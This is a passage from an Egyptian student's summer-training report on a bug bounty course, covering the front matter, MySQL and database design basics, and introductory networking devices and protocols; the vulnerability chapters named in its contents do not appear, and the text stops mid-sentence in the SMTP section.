Higher Technological Institute,

DigitalFortress

The summer training program on

Bug bounty

Submitted to:
Dr. Mai mohy
Literature at HTI in Electrical and Communication Department

Submitted by:

Name ID
Donia Ali Mohamed Alaa 20220181

AUGST 2025
A Thesis Presented for the
Accomplish the Summer Training
Higher Technological Institute, Tenth of Ramadan
 ABSTRACT
The summer training program on Cybersecurity, conducted at Digital Fortresses in collaboration with the
Higher Technological Institute (HTI) and supervised by Instructor Adam, was an intensive and immersive
learning experience designed to develop the technical expertise and analytical skills necessary for securing
modern IT systems. The program combined a well-structured curriculum with hands-on practical exercises,
offering participants exposure to a broad spectrum of cybersecurity domains. Covering essential topics such
as networking fundamentals, information gathering, Linux system administration, Bash scripting, web
application security, and penetration testing, the course aimed to create a balance between theoretical
foundations and real-world application. This ensured that trainees not only understood the principles of
cybersecurity but could also apply them effectively in professional scenarios.

The training began with Networking Fundamentals, where participants explored the architecture of
computer networks, IP addressing schemes, subnetting, and security protocols. This was followed by
Information Gathering and Reconnaissance modules, which introduced both passive and active intelligence
collection methods to identify system weaknesses without detection, as well as targeted probing techniques
for vulnerability discovery. In parallel, participants completed Linux System Administration training, gaining
the ability to configure and secure Linux-based environments, manage users and permissions, and monitor
system performance. The Bash Scripting component further enhanced these skills by teaching automation
techniques for administrative and security tasks, significantly improving operational efficiency.

The Web Application Security Testing segment was a cornerstone of the program, focusing on real-world
vulnerabilities and their exploitation. Trainees learned to identify and mitigate threats such as SQL injection,
Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), path traversal, file inclusion, and
authentication bypass. These sessions were complemented by practical labs using professional tools,
including Burp Suite for intercepting and manipulating HTTP requests, Nmap for network mapping and
scanning, and Metasploit for controlled exploitation of security flaws. The course emphasized secure coding
practices, proper configuration, and defensive measures to ensure that systems remain resilient against
evolving threats.

In its final phase, the program shifted toward Advanced Penetration Testing and Applied Cybersecurity
Projects. Participants simulated real attack scenarios, working in controlled lab environments to assess,
exploit, and secure vulnerable systems. These projects required integrating all previously acquired skills —
from reconnaissance to exploitation and post-exploitation — into a cohesive security assessment. The
collaborative and project-based approach fostered teamwork, critical thinking, and professional reporting
skills. Overall, this summer training provided a strong foundation in cybersecurity principles and practices,
preparing graduates to confront the challenges of today’s rapidly evolving threat landscape with
competence and confidence.

II
 Acknowledgement
This report is wholeheartedly dedicated to my beloved family and friends, whose unwavering support,
encouragement, and belief in my abilities have been a constant source of motivation, strength, and
inspiration throughout my journey. Their faith in me has given me the courage to face challenges, the
determination to strive for excellence, and the resilience to keep moving forward, even in difficult moments.
I am deeply grateful to Digital Fortresses for hosting and organizing this exceptional cybersecurity summer
training program, and to the Higher Technological Institute (HTI) for making it possible for students to gain
such a valuable learning experience that bridges academic study with real-world application. My sincere
appreciation goes to Dr. Mai, whose vision, guidance, and tireless dedication were instrumental in bringing
this program to life; her passion for education, mentorship, and student development has left a profound
and lasting impact on my academic and professional growth. I also extend my heartfelt thanks to our
instructor, Adam, for his patience, expertise, and commitment to ensuring that each trainee not only
understood theoretical concepts but also gained the practical skills essential for success in the cybersecurity
field. His dedication to teaching, his willingness to answer every question, and his encouragement to think
critically have greatly enhanced my learning experience. Finally, I dedicate this work to my fellow trainees,
whose teamwork, collaboration, and supportive spirit transformed this program into an inspiring journey of
shared growth, mutual respect, and lasting friendship, making every challenge an opportunity and every
achievement a collective celebration.

III
 TABLE of CONTENT

Contents
ABSTRACT ............................................................................................................................................................ II
Acknowledgement.............................................................................................................................................. III
TABLE of CONTENT ............................................................................................................................................. IV
Abbreviations ...................................................................................................................................................... 0
Introduction ..................................................................................................................................................... 1
Chapter 1: Database Fundamentals with MySQL .............................................. Error! Bookmark not defined.
1.1 Introduction to Databases ..................................................................................................................... 2
1.2 MySQL Basics ......................................................................................................................................... 4
1.3 Database Design .................................................................................................................................. 11
Chapter 2: Computer Networks .................................................................................................................... 15
2.1 Introduction to Networking ................................................................................................................. 15
2.2 Network Devices .................................................................................................................................. 18
Conclusion ................................................................................................................................................. 23
Conclusion ................................................................................................................................................. 29
Conclusion ................................................................................................................................................. 33
Chapter 3: Tools............................................................................................................................................. 34
3.1 gau (GetAllUrls) ....................................................................................................................................... 34
3.2 katana ...................................................................................................................................................... 34
3.3 assetfinder ............................................................................................................................................... 34
3.4 subfinder.................................................................................................................................................. 34
3.5 ffuf ........................................................................................................................................................... 34
3.6 arjun (aka gosarjun) ................................................................................................................................. 35
3.7 gospider ................................................................................................................................................... 35
3.8 gobuster................................................................................................................................................... 35
3.9 dirsearch .................................................................................................................................................. 36
4.1 Introduction to Information Gathering ................................................................................................... 36
4.1.1 What is Information Gathering? ....................................................................................................... 37
4.2 The Information Gathering Process: A Step-by-Step Guide .................................................................... 37
4.2.1 Identifying Objectives and Defining Scope ....................................................................................... 37
4.2.2 Selecting Appropriate Data Collection Methods .............................................................................. 37
4.2.3 Analyzing and Organizing Gathered Data......................................................................................... 38
4.3 Tactical Tools for Information Gathering ................................................................................................ 38
IV
 4.3.1 Network Mappers and Port Scanners .............................................................................................. 38
4.3.2 Packet Sniffers and Protocol Analyzers ............................................................................................ 38
4.3.3 Domain and IP Research Tools ......................................................................................................... 38
4.4 Advanced Techniques in Information Gathering..................................................................................... 39
4.4.1 Penetration Testing with Metasploit Framework ............................................................................ 39
4.4.2 Data Mining for In-depth Analysis .................................................................................................... 39
4.4.3 Leveraging Search Engines and Online Resources ........................................................................... 39
4.5 Practical Applications .............................................................................................................................. 39
4.5.1 Case Studies ...................................................................................................................................... 39
4.5.2 Cybersecurity .................................................................................................................................... 39
4.5.3 Market Research............................................................................................................................... 39
4.6 Ethical Considerations in Information Gathering .................................................................................... 39
4.7 Maximizing Efficiency in Information Gathering ..................................................................................... 40
4.8 Frequently Asked Questions (FAQ) ......................................................................................................... 40
Chapter 5: vulnerabilities .................................................................................................................................. 41
5.1 Information disclosure vulnerabilities ..................................................................................................... 41
5.1.1 What is information disclosure?....................................................................................................... 41
5.1.2 Examples of information disclosure ................................................................................................. 42
5.1.3How do information disclosure vulnerabilities arise?..................................................................... 42
5.1.4 What is the impact of information disclosure vulnerabilities? ...................................................... 43
5.1.5 Exploiting information disclosure ................................................................................................... 44
5.1.6 How to prevent information disclosure vulnerabilities ................................................................. 44
5.2 SQL injection ............................................................................................................................................ 45
5.2.1 What is SQL injection (SQLi)? ........................................................................................................... 45
5.2.2 What is the impact of a successful SQL injection attack? ................................................................ 46
5.2.3 How to detect SQL injection vulnerabilities ..................................................................................... 46
5.2.4SQL Injection Examples.................................................................................................................... 47
5.3 OS command injection............................................................................................................................ 48
5.3.1 What is OS command injection? ...................................................................................................... 48
5.3.2 Basic Example ................................................................................................................................... 49
5.3.3 Useful Commands After Finding Injection........................................................................................ 49
5.3.4 Blind OS Command Injection Techniques ........................................................................................ 49
5.3.5 Shell Metacharacters for Injection ................................................................................................... 49
5.3.6 Quoted Context Issues ..................................................................................................................... 49
5.3.7 Prevention ........................................................................................................................................ 49
5.4 Path traversal........................................................................................................................................... 49

V
 5.4.1 What is path traversal? .................................................................................................................... 50
5.4.2 Basic Path Traversal .......................................................................................................................... 50
5.4.3 Obstacles & Bypasses ....................................................................................................................... 51
5.5 Local File Inclusion (LFI) ........................................................................................................................... 51
5.5.1 How LFI Works .................................................................................................................................. 52
5.5.2 Identifying LFI ................................................................................................................................... 52
5.5.3 LFI Attack Scenarios .......................................................................................................................... 52
5.5.4 Impacts of LFI.................................................................................................................................... 52
5.5.5 LFI Remediation ................................................................................................................................ 53
5.6 Server-side request forgery (SSRF)...................................................................................................... 53
5.6.1 What is SSRF? ................................................................................................................................... 53
5.6.2 What is the impact of SSRF attacks? ................................................................................................ 54
5.6.3 Common SSRF attacks ...................................................................................................................... 54
5.6.4 SSRF Attacks Against Other Back-End Systems ................................................................................ 56
5.6.5 Circumventing Common SSRF Defenses........................................................................................... 56
5.6.6 SSRF with Whitelist-Based Input Filters ........................................................................................... 57
5.6.7 A New Era of SSRF: Bypassing Filters via Open Redirection ............................................................. 57
5.6.8 Blind SSRF Vulnerabilities ................................................................................................................. 58
5.6.9 Finding and Exploiting Blind SSRF ..................................................................................................... 58
5.6.10 SSRF via URLs in Data Formats ....................................................................................................... 58
5.6.11 SSRF via the Referer Header ........................................................................................................... 58
5.7 Insecure direct object references (IDOR) ................................................................................................ 59
5.7.1 What are insecure direct object references (IDOR)? .................................................................. 59
5.7.2 IDOR examples.................................................................................................................................. 59
IDOR Vulnerabilities: ................................................................................................................................. 59
Chapter 6:Laps ................................................................................................................................................... 59
6.1 SQLI .......................................................................................................................................................... 59
5.8 Authentication Bypass ............................................................................................................................. 60
5.8.1 Common causes of authentication bypass ....................................................................................... 61
5.8.2 Preventing Authentication Bypass ................................................................................................... 61
Lab 6.1.1: ................................................................................................................................................... 61
Lap 6.1.2 .................................................................................................................................................... 63
6.2 Authentication ......................................................................................................................................... 65
6.2.1 Lab 1 Username enumeration via different responses .................................................................... 65
6.2.2 Lab 2 2FA simple bypass ................................................................................................................... 67
6.2.3 Lab 3 Password Reset Broken Logic ................................................................................................. 67

VI
 6.2.4 Lab 4 Username enumeration via subtly different responses ......................................................... 68
6.3 Server-Side Request Forgery (SSRF) ........................................................................................................ 69
6.3.1 Lab 1 Basic SSRF against the local server ......................................................................................... 70
6.3.2 Lab 2 Basic SSRF against another back-end system ......................................................................... 72
6.3.3 Lab 3 Blind SSRF with out-of-band detection ................................................................................... 73
6.4 Some CTFS ............................................................................................................................................... 73
6.4.1 Lap1 .................................................................................................................................................. 74
6.4.2 Lap2 :Challenge Name: Can you find the robots? ............................................................................ 75
6.5 OS command injection ............................................................................................................................ 79
6.5.1 Lap 1 ................................................................................................................................................. 81
6.5.2 lap 2 .................................................................................................................................................. 83
6.5.3 Lap 3 ................................................................................................................................................. 85
6.6 Path Traversal .......................................................................................................................................... 88
6.6.1 Lab 1 File path traversal, simple case ............................................................................................... 89
6.6.2 Lab 2 File path traversal, traversal sequences blocked with absolute path bypass......................... 90
6.6.3 Lab 3 File path traversal, traversal sequences stripped non-recursively....................................... 91
6.6.4 Lab 4 File path traversal, traversal sequences stripped with superfluous URL-decode ............... 92
6.7 Business Logic Vulnerability ................................................................................................................ 92
Conclusion ....................................................................................................................................................... 106
References ....................................................................................................................................................... 107

VII
 Abbreviations
Abbreviation Full Form
gau Get All URLs
katana Katana Scanner Tool
ssrf Server-Side Request Forgery
sqli SQL Injection
IDOR Insecure Direct Object Reference
LFI Local File Inclusion
OS Command Injection Operating System Command Injection
LAPs Labs And Practicals
API Application Programming Interface
DNS Domain Name System
HTTP Hypertext Transfer Protocol
URL Uniform Resource Locator
WAF Web Application Firewall
SQL Structured Query Language
HTML Hypertext Markup Language
XML eXtensible Markup Language
 Introduction

In the modern digital era, web applications have become the backbone of communication, commerce,
education, and innovation. Their ability to deliver dynamic content, process user interactions, and store sensitive
information makes them indispensable across industries. However, this growing reliance on web applications has
also made them a prime target for cyber threats, where attackers exploit vulnerabilities to gain unauthorized
access, steal data, or disrupt services. As technology continues to evolve, the methods of attack have become
more sophisticated, requiring equally advanced and proactive approaches to security testing.

This report explores fundamental aspects of networking, information gathering, and vulnerability assessment,
with a particular emphasis on understanding the mechanisms through which web applications operate and how
they can be exploited if not properly secured. Networking fundamentals provide the essential knowledge of how
data travels between systems, the protocols that govern communication, and the underlying infrastructure that
supports web-based operations. Information gathering techniques, both passive and active, form the foundation
of security testing, allowing testers to map the target environment, identify potential entry points, and assess the
scope of the application’s exposure.

The study then delves into common vulnerabilities encountered during penetration testing, such as information
disclosure, SQL injection, command injection, path traversal, file inclusion, Server-Side Request Forgery (SSRF),
Insecure Direct Object References (IDOR), and authentication bypass. Each of these vulnerabilities represents a
potential threat vector that, if left unaddressed, can have significant consequences for the confidentiality,
integrity, and availability of an application and its data.

In addition to theoretical analysis, this report also outlines practical applications through Laboratory Activities
and a Website Project. These hands-on components provide an opportunity to implement learned concepts,
simulate real-world attack scenarios, and explore mitigation strategies. By bridging theoretical understanding
with applied practice, the report ensures that the reader gains both conceptual clarity and technical proficiency.

Ultimately, the aim of this document is not only to present a comprehensive overview of web application
security testing but also to emphasize the importance of adopting a proactive and systematic approach to
safeguarding digital assets. With cyber threats becoming more frequent and damaging, security testing is no
longer an optional phase in the development lifecycle — it is a necessity that must be integrated into every stage
of system design, deployment, and maintenance. Through this detailed examination, the report aspires to equip
readers with the knowledge and skills necessary to identify vulnerabilities, understand their impact, and
implement effective countermeasures in a rapidly changing threat landscape.

1
1.1 Introduction to Databases
Databases are an essential component of modern computing, serving as the backbone for data storage,
retrieval, and management in virtually every sector. From small personal projects to large-scale
enterprise systems, databases play a crucial role in ensuring data integrity, accessibility, and
performance. This chapter provides a comprehensive overview of databases, their significance, and
the various types and technologies that underpin them.

Figure 0.1.1

1.1.1 Definition and Purpose

A database is a structured collection of data that is stored and accessed electronically. The primary
purpose of a database is to efficiently store, manage, and retrieve large volumes of data in a way that
supports various applications and user needs. Databases are designed to handle complex queries and
transactions, ensuring that data is consistently available and
accurately represented.

1.1.2 Database vs. File Systems

While both databases and file systems are used for data storage, they serve different purposes and
offer distinct advantages:

• File Systems: Traditional file systems store data in a hierarchical structure of files and
directories. They are suitable for simple storage needs but lack advanced querying
capabilities and data integrity mechanisms.
• Databases: Databases provide a more sophisticated approach to data management, offering
powerful querying languages (like SQL), transaction management, and data integrity

2
 features. They are optimized for handling large datasets and complex relationships between
data entities.

1.1.3 Types of Databases

Databases can be broadly categorized into three types based on their data models and storage
mechanisms:

Figure 1.2

3- Relational Databases (RDBMS)

• Definition: Relational databases use a structured schema to organize data into tables (relations)
with predefined columns and data types. Each table can have relationships with other tables,
enforced through foreign keys.
• Examples: MySQL, PostgreSQL, Oracle Database, Microsoft SQL Server.
• Use Cases: Transactional applications, enterprise systems, data warehousing.

2- NoSQL Databases

• Definition: NoSQL databases are designed to handle unstructured or semi-structured data,

offering flexible schemas and scalable architectures. They do not rely on fixed table structures
or SQL for querying.
• Subtypes:
o Document Stores: Store data as JSON or BSON documents (e.g., MongoDB, CouchDB).
o Key-Value Stores: Store data as key-value pairs (e.g., Redis, DynamoDB). o Column
Stores: Store data in columns rather than rows (e.g., Apache Cassandra, HBase). o Graph
Databases: Store data as nodes and edges, representing relationships (e.g., Neo4j,
Arango DB).
• Use Cases: Real-time analytics, content management, social networks,
IoT applications.

3- NewSQL Databases

3
 • Definition: NewSQL databases aim to combine the scalability of NoSQL systems with the
consistency and ACID (Atomicity, Consistency, Isolation, Durability) properties of traditional
RDBMS.
• Examples: Google Spanner, Cockroach DB, Volt DB.
• Use Cases: Large-scale transactional applications, high-performance OLTP (Online Transaction
Processing) systems.
1.1.4 Importance of Databases

Databases are vital for various reasons:

• Data Integrity: Databases enforce rules and constraints to ensure data accuracy and
consistency.
• Scalability: Modern databases are designed to handle increasing amounts of data and user
load.
• Security: Databases provide robust security features to protect sensitive data from
unauthorized access and breaches.
• Performance: Efficient indexing and query optimization techniques enable fast data retrieval,
even for complex queries.
• Data Management: Databases support complex data relationships and transactions, making it
easier to manage and manipulate data.

In conclusion, understanding the fundamentals of databases is crucial for any aspiring IT professional.
This chapter sets the stage for more in-depth exploration of specific database technologies and their
applications, starting with the MySQL relational database system, which is widely used and renowned
for its reliability and performance in various environments.

1.2 MySQL Basics

MySQL is one of the most widely used relational database management systems (RDBMS). It is known
for its reliability, performance, and ease of use, making it a popular choice for a wide range of
applications from small-scale projects to large enterprise solutions. This section covers the basics of
MySQL, including its installation and configuration, as well as fundamental SQL commands.

4
 Figure 1.3

1.2.1 Installation and Configuration

Installing and configuring MySQL involves several steps, depending on the operating system you are
using. Below are general steps for installation on common platforms:

1.2.1.A Installation on Windows

1. Download MySQL Installer:

o Visit the MySQL official website and download the MySQL Installer for Windows.

Figure 1.4

2. Run the Installer:

o Launch the downloaded installer file.

5
 Figure 0

o Choose the setup type (Full, Developer Default, Server Only, etc.) based on your
requirements.

Figure 1.6

Configure MySQL Server:

o Choose a configuration type (Standalone MySQL Server, InnoDB Cluster, etc.).

Figure 1.7

6
 Figure 1. 7

o Configure the MySQL Server (e.g., setting the root password, default port, and server
configuration).

Figure 1.8

3. Start MySQL Server:

o Start the MySQL service from the Windows Services panel or the MySQL Workbench.

4. Verify Installation:
o Open MySQL Workbench or the MySQL command-line client and connect to the MySQL
server using the root user credentials.

7
 Figure 1. 9

1.2.1.B Installation on Linux

Figure 1. 10

1. Update Package Index:

o Run sudo apt-get update (Debian-based) or sudo yum update (Red Hat-based) to update the
package index.
2. Install MySQL Server:
o Run sudo apt-get install mysql-server for Debian-based systems or sudo yum install mysqlserver
for Red Hat-based systems.
3. Start MySQL Service:
o Start the MySQL service using sudo systemctl start mysql (systemd) or sudo service mysqld start
(SysVinit).
4. Secure MySQL Installation:
o Run sudo mysql_secure_installation and follow the prompts to set the root password and
secure the MySQL installation.
5. Verify Installation:

8
 o Connect to the MySQL server using mysql -u root -p and verify the installation.

1.2.2 Basic Configuration

1. MySQL Configuration File:

o The main configuration file for MySQL is my.cnf (Linux) or my.ini (Windows). o This file is
typically located in /etc/mysql/ (Linux) or the MySQL installation directory (Windows).

Figure 1. 11

2. Common Configuration Options:

o [mysqld]: This section configures the MySQL server. Common options include:
▪ port: The port number MySQL listens on (default is 3306).
▪ datadir: The directory where MySQL stores its data.
▪ max_connections: The maximum number of simultaneous connections.
▪ default_authentication_plugin: The default authentication plugin used.
3. Restart MySQL Service:
o After making changes to the configuration file, restart the MySQL service to apply the
changes using sudo systemctl restart mysql (systemd) or sudo service mysqld restart (SysVinit).

9
 1.2.3 Basic SQL Commands

SQL (Structured Query Language) is the standard language for interacting with relational databases.
The basic SQL commands for data manipulation include SELECT, INSERT, UPDATE, and DELETE.

SELECT
The SELECT statement is used to retrieve data from one or more tables. Syntax:

Example:

INSERT
The INSERT statement is used to add new records to a table. Syntax:

Example:

UPDATE
The UPDATE statement is used to modify existing records in a table. Syntax:

10
 Example:

DELETE
The DELETE statement is used to remove records from a table. Syntax:

Example:

These basic SQL commands form the foundation for interacting with MySQL databases. Mastery of
these commands is essential for managing and manipulating data effectively in a relational database.

1.3 Database Design

Database design is a critical aspect of developing an efficient and effective database system. It involves
planning and structuring a database to meet the requirements of users and applications while ensuring
data integrity, performance, and scalability. This section explores key concepts in database design,
including Entity-Relationship (ER) modeling, normalization, and practical considerations for designing
a robust database.

11
 Figure 1. 12

1.3.1 Entity-Relationship (ER) Modeling

ER modeling is a conceptual approach to database design that visually represents the structure of the
database. It uses entities, attributes, and relationships to depict how data is organized and how
different data elements are related.

Figure 1. 13

Entities:
Entities are objects or things in the real world that have a distinct existence. Each entity represents a
table in the database. For example, in a hospital database, entities could include Patient, Doctor,
Appointment, and Medication.

Attributes:

12
 Attributes are properties or characteristics of entities. Each attribute corresponds to a column in the
table. For instance, the Patient entity might have attributes like PatientID, FirstName, LastName, DateOfBirth,
and ContactNumber.

Relationships:
Relationships describe how entities are connected to one another. They can be one-to-one, one-to-
many, or many-to-many. For example, a Doctor can have many Appointments, but each Appointment is
associated with only one Doctor. This is a one-to-many relationship.

ER Diagram Example:

• Entities: Patient, Doctor, Appointment • Attributes:

o Patient: PatientID, FirstName, LastName, DateOfBirth,
ContactNumber o Doctor: DoctorID, FirstName, LastName,
Specialization, ContactNumber o Appointment: AppointmentID,
PatientID, DoctorID, AppointmentDate, Reason
• Relationships:
o Patient to Appointment (one-to-many) o Doctor to
Appointment (one-to-many)

1.3.2 Normalization

Normalization is a process used to organize a database into tables and columns to reduce data
redundancy and improve data integrity. The primary goal of normalization is to ensure that each
piece of data is stored in only one place.

13
 Figure 1. 14

Normal Forms:
Normalization involves applying a series of rules called normal forms. The most commonly used normal
forms are:

1. First Normal Form (1NF):

o Ensure that each table column contains atomic (indivisible) values. o Each column
must contain only one value per row.
o Remove any repeating groups of columns.
2. Second Normal Form (2NF):
o Meet all requirements of 1NF.
o Remove partial dependencies; ensure that non-key attributes are fully dependent on
the primary key.
3. Third Normal Form (3NF):
o Meet all requirements of 2NF. o Remove transitive dependencies; ensure that non-
key attributes are not dependent on other non-key attributes.

1.3.3 Practical Considerations

In addition to ER modeling and normalization, there are several practical considerations in database
design:

• Performance: Consider indexing frequently queried columns to improve retrieval speed.

However, be mindful of the trade-off between read performance and write performance.
• Scalability: Design the database to handle increasing amounts of data and user load. This may
involve partitioning large tables or using distributed databases.
• Security: Implement access controls and encryption to protect sensitive data. Ensure that only
authorized users can access and modify data.
• Backup and Recovery: Plan for regular backups and ensure that recovery procedures are in
place to protect against data loss.
• Consistency and Integrity: Use constraints (e.g., primary keys, foreign keys, unique constraints)
to enforce data integrity and maintain consistency.

In conclusion, effective database design is crucial for developing a robust and efficient database
system. By employing ER modeling, normalization, and considering practical aspects of performance,
scalability, security, and data integrity, you can create a database that meets the needs of users and
applications while ensuring reliability and maintainability.

14
 Chapter 2: Computer Networks

2.1 Introduction to Networking

Networking is a fundamental aspect of modern computing that enables the communication and
exchange of data between devices. This chapter provides a comprehensive overview of networking, its
importance, and key concepts and technologies that underpin it.

Figure 2. 1

2.1.1 Definition and Purpose of Networking

Networking refers to the interconnection of multiple devices (such as computers, servers, and other
hardware) to share resources and communicate. Networks can range from simple setups, like a home
network connecting a few devices, to complex, large-scale enterprise networks connecting thousands
of devices across multiple locations.

The primary purposes of networking include:

• Resource Sharing: Allows multiple devices to share resources such as files, printers, and
internet connections.
• Communication: Enables devices to communicate through various protocols and services, such
as email, instant messaging, and VoIP.
• Data Transfer: Facilitates the transfer of data between devices, essential for applications like
cloud computing and data centers.
• Collaboration: Supports collaborative work environments, allowing users to access and work
on shared documents and applications in real-time.

15
 2.1.2 Network Types

Figure 2. 2

Networks can be categorized based on their size, geographical coverage, and architecture:

1. Local Area Network (LAN): Covers a small geographical area, such as a home, office, or building.
LANs are typically used for connecting personal computers and devices within a limited area.
2. Wide Area Network (WAN): Spans a large geographical area, often connecting multiple LANs.
The internet is the largest example of a WAN.
3. Metropolitan Area Network (MAN): Covers a city or metropolitan area, larger than a LAN but
smaller than a WAN.
4. Personal Area Network (PAN): A small network, usually within a range of a few meters, used
to connect personal devices like smartphones, tablets, and laptops.
5. Virtual Private Network (VPN): Extends a private network across a public network, enabling
secure communication and data transfer over the internet.

16
 2.1.3 Network Topologies

Figure 2. 3

Network topology refers to the arrangement of devices and how they are interconnected. Common
topologies include:

1. Bus Topology: All devices are connected to a single central cable (bus). It is simple and cost-
effective but can suffer from collisions and is not highly scalable.
2. Star Topology: All devices are connected to a central hub or switch. It is easy to manage and
scalable, but the central point can be a single point of failure.
3. Ring Topology: Devices are connected in a circular fashion, with each device connected to two
other devices. It can be efficient but is less commonly used due to complexity and failure
vulnerability.
4. Mesh Topology: Every device is connected to every other device. It provides high redundancy
and reliability but is expensive and complex to implement.
5. Hybrid Topology: Combines two or more different topologies to leverage the advantages of
each.

2.1.4 Importance of Networking

Networking is crucial for several reasons:

• Connectivity: Enables devices to connect and communicate, forming the backbone of modern
digital communication.
• Resource Optimization: Allows efficient use of resources by sharing devices and data across
multiple users and applications.
• Scalability: Facilitates the growth of systems and infrastructure, supporting more devices and
users as needed.

17
 • Collaboration: Enhances productivity by enabling real-time collaboration and information
sharing.
• Data Accessibility: Ensures data is accessible from anywhere, supporting remote work and
cloud computing.

In conclusion, understanding the fundamentals of networking is essential for anyone involved in IT and
computing. This chapter introduces the key concepts, types, topologies, protocols, and devices that
form the basis of modern networks, setting the stage for more advanced topics and practical
applications.

2.2 Network Devices

Network devices are critical components that enable communication, data transfer, and connectivity
within and between networks. This section explores the various types of network devices, their
functions, and how they contribute to building and maintaining efficient and secure networks.

2.2.1. Router

Function: Routers are devices that forward data packets between computer networks. They route
traffic from one network to another, typically from a local area network (LAN) to a wide area network
(WAN), such as the internet.

18
 Figure 2. 4

Key Features:

• Routing: Determines the best path for data packets to reach their destination using routing
tables and algorithms.
• NAT (Network Address Translation): Translates private IP addresses within a LAN to a public IP
address for internet access.
• Firewall Capabilities: Provides basic security by filtering incoming and outgoing traffic based on
predefined rules.
• Wireless Connectivity: Many modern routers include wireless capabilities, functioning as access
points to provide Wi-Fi connectivity.

Example: Home routers, enterprise routers (e.g., Cisco, Juniper).

2.2.2. Switch

Function: Switches connect devices within a LAN and use MAC addresses to forward data to the correct
destination within the network. They operate at the data link layer (Layer 2) of the OSI model.

Figure 2. 5

19
 Key Features:

• Frame Forwarding: Forwards Ethernet frames based on MAC addresses.

• VLAN Support: Allows the creation of virtual LANs to segment network traffic.
• Full-Duplex Communication: Supports simultaneous sending and receiving of data on a
connection.
• Port Mirroring: Enables monitoring of network traffic by copying data from one port to another
for analysis.

Example: Unmanaged switches (simple, plug-and-play), managed switches (configurable, often used in
enterprise networks).

2.2.3. Hub

Function: Hubs are basic networking devices that connect multiple Ethernet devices, making them act
as a single network segment. They operate at the physical layer (Layer 1) of the OSI model.

Figure 2. 6

Key Features:

• Broadcast Communication: Transmits data received on one port to all other ports.
• Collision Domain: All devices connected to a hub share the same collision domain, which can
lead to network inefficiencies.

Example: 4-port, 8-port, and 16-port hubs (largely obsolete in modern networks, replaced by switches).

20
 2.2.4. Access Point (AP)

Function: Access points enable wireless devices to connect to a wired network using Wi-Fi.
They extend the reach of a network and facilitate wireless communication.

Figure 2. 7

Key Features:

• Wireless Standards: Supports various Wi-Fi standards (e.g., 802.11a/b/g/n/ac/ax).

• SSID (Service Set Identifier): Allows configuration of network names for identification.
• Security Protocols: Implements security measures such as WPA3, WPA2, and WEP.
• Multiple SSIDs: Supports multiple network names for different user groups or purposes.

Example: Standalone access points, integrated wireless routers, enterprise access points (e.g., Ubiquiti,
Cisco Meraki).

2.2.5. Modem

Function: Modems modulate and demodulate digital data into a format suitable for transmission over
analog communication lines, such as telephone lines or cable systems.

21
 Figure 2. 8

Key Features:

• Modulation/Demodulation: Converts digital signals from a computer to analog signals for

transmission and vice versa.
• Types: Dial-up modems, DSL modems, cable modems, fiber optic modems.
• Connection Interfaces: Connects to ISPs (Internet Service Providers) for internet access.

Example: DSL modems, cable modems, fiber optic modems (e.g., Motorola, Netgear).

2.2.6. Firewall

Function: Firewalls are network security devices that monitor and control incoming and outgoing
network traffic based on predetermined security rules. They act as a barrier between trusted and
untrusted networks.

Figure 2. 9

Key Features:

• Packet Filtering: Inspects incoming and outgoing packets and allows or blocks them based on
security rules.

22
 • Stateful Inspection: Keeps track of active connections and makes decisions based on the state
of the connection.
• Intrusion Detection/Prevention: Identifies and responds to potential security threats.
• VPN Support: Enables secure remote access through Virtual Private Networks.

Example: Hardware firewalls (e.g., Fortinet, Palo Alto Networks), software firewalls (e.g., Windows
Firewall).

2.2.7. Network Interface Card (NIC)

Function: NICs are hardware components that connect a computer or other device to a network. They
can be wired or wireless.

Figure 2. 10

Key Features:

• MAC Address: Each NIC has a unique Media Access Control address for network identification.
• Speed and Duplex: Supports various speeds (e.g., 10/100/1000 Mbps) and full/halfduplex
communication.
• Wired/Wireless: Available in Ethernet (wired) and Wi-Fi (wireless) versions.

Example: Built-in NICs in computers, external USB NICs, PCIe NICs.

Conclusion

Network devices play a vital role in establishing and maintaining efficient, secure, and scalable
networks. Understanding the functions and features of these devices is essential for designing,
implementing, and managing network infrastructures. Each device contributes uniquely to the overall
functionality of the network, ensuring seamless communication and data transfer across different
environments.

23
 2.3 Network Protocols

Network protocols are a set of rules and conventions that govern how data is transmitted and received
across networks. They ensure reliable communication and interoperability between different devices
and systems. This section covers some of the most essential network protocols, their functions, and
how they operate within the networking ecosystem.

Figure 2. 11

2.3.1. Transmission Control Protocol/Internet Protocol (TCP/IP)

Function: TCP/IP is the foundational protocol suite for the internet and most modern networks. It
ensures reliable communication by providing end-to-end data transfer and addressing mechanisms.

Figure 2. 12

Components:

• IP (Internet Protocol): Handles addressing and routing of packets to ensure they reach the
correct destination.

24
 • TCP (Transmission Control Protocol): Ensures reliable, ordered, and error-checked delivery of
a stream of data between applications.
• UDP (User Datagram Protocol): Provides a connectionless datagram service that emphasizes
speed over reliability, used for applications like streaming and gaming.

Operation:

• Data Encapsulation: Data is broken into packets, encapsulated with headers for IP addressing
and TCP/UDP control information.
• Routing: IP handles the forwarding of packets from the source to the destination through
intermediate routers.
• Error Checking: TCP provides mechanisms for error detection, retransmission of lost packets,
and ensuring data integrity.

2.3.2. Hypertext Transfer Protocol (HTTP/HTTPS)

Function: HTTP is the protocol used for transferring web pages over the internet. HTTPS is the secure
version, encrypting data for safe transmission.

Figure 2. 13

Components:

• HTTP: Defines how messages are formatted and transmitted, and how web servers and
browsers should respond to various commands.
• HTTPS: Adds a layer of security by using SSL/TLS to encrypt data between the client and server.

Operation:

• Request/Response Model: Clients send HTTP requests to servers, which respond with the
requested resources or error messages.
• Status Codes: HTTP uses status codes to indicate the result of a request (e.g., 200 OK, 404 Not
Found, 500 Internal Server Error).

25
 • Secure Communication: HTTPS ensures data privacy and integrity through encryption and
secure certificate validation.

2.3.3. File Transfer Protocol (FTP)

Function: FTP is used for transferring files between computers on a network.

Figure 2. 14

Components:

• FTP Client: The software used to initiate a connection and transfer files to/from an FTP server.
• FTP Server: The software that hosts files and responds to requests from FTP clients.

Operation:

• Control Connection: Establishes a session between the client and server for sending commands.
• Data Connection: Handles the actual transfer of files.
• Commands: Includes commands for navigating directories, uploading/downloading files, and
managing file permissions.

2.3.4. Simple Mail Transfer Protocol (SMTP)

Function: SMTP is used for sending and receiving email messages.

26
 Figure 2. 15

Components:

• SMTP Client: Sends email messages to an SMTP server.

• SMTP Server: Receives and forwards email messages to their destination.
Operation:

• Mail Submission: The client sends an email to the server using the SMTP protocol.
• Mail Transfer: The server forwards the email to the recipient's server, which delivers it to the
recipient's mailbox.
• Commands: Includes commands for initiating a session, sending mail data, and closing the
